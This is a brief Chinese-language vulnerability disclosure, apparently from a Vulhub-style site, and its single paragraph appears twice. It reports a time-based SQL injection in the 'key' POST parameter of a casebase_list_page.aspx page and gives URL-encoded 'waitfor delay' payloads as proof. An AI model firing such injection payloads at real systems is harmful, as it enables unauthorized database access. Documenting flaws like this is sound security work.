VULHUB ™

漏洞发生在:/webpages/casebase_list_page.aspx 在关键词查找的地方 post参数Key存在sql注入: 测试如下:  当key="test%27%29%3Bwaitfor+delay+%270%3A0%3A0%27--" 时不存在延时  当key="test%27%29%3Bwaitfor+delay+%270%3A0%3A5%27--" 明显延时5秒 存在延时注入.

漏洞发生在:/webpages/casebase_list_page.aspx 在关键词查找的地方 post参数Key存在sql注入: 测试如下:  当key="test%27%29%3Bwaitfor+delay+%270%3A0%3A0%27--" 时不存在延时  当key="test%27%29%3Bwaitfor+delay+%270%3A0%3A5%27--" 明显延时5秒 存在延时注入.